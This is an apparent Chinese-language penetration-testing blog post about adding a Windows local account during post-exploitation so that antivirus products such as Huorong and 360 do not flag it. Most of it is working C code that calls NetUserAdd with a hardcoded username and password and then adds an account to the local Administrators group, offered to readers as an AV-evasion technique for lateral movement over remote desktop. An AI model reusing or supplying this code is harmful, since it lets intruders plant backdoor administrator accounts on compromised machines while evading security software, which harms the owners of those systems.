0x01前言
在后渗透中有时候需要登录远程桌面横向,有时候添加账户较粗暴直接。
0x02测试
在命令行中直接添加、删除账户,火绒都会提示。
0x03绕过
可以看当前的用户我们是没有CXKGG此用户的。
运行生成的user_add.exe发现CXKGG已出现。
直接绕过火绒了,360也可以绕过的,国内的基本绕过。
0x04代码
这是我魔改的代码:
#ifndef UNICODE
#define UNICODE
#endif
#pragma comment(lib, "netapi32.lib")
#include <stdio.h>
#include <windows.h>
#include <lm.h>
int wmain(int argc, wchar_t* argv[])
{
USER_INFO_1 xiayu;
DWORD dwLevel = 1;
DWORD dwError = 0;
NET_API_STATUS xiayu_sta;
xiayu.usri1_name = (LPWSTR)TEXT("CXKGG");
//(LPWSTR)TEXT("CXKGG");此处CXKGG为需添加的账户名
xiayu.usri1_password = (LPWSTR)TEXT("admin@123");
//(LPWSTR)TEXT("admin@123");此处admin@123为需添加的密码。
xiayu.usri1_priv = USER_PRIV_USER;
xiayu.usri1_home_dir = NULL;
xiayu.usri1_comment = NULL;
xiayu.usri1_flags = UF_SCRIPT;
xiayu.usri1_script_path = NULL;
xiayu_sta = NetUserAdd(NULL,dwLevel,(LPBYTE)&xiayu,&dwError);
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = argv[1];
NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
return 0;
}
xiayu.usri1_name = (LPWSTR)TEXT("CXKGG");
xiayu.usri1_password = (LPWSTR)TEXT("admin@123");
此处的代码我改过,应为想直接运行就能添加指定的用户。
关于需用命令行添加任意账户和密码可参考:
我叫夏雨!!!!!!!!!!!!!!!!!!!!
参考链接:
https://blog.csdn.net/qq_19623861/article/details/127960400?spm=1001.2014.3001.5506
https://payloads.cn/2021/1230/bypass-av-add-user.html
https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netuseradd
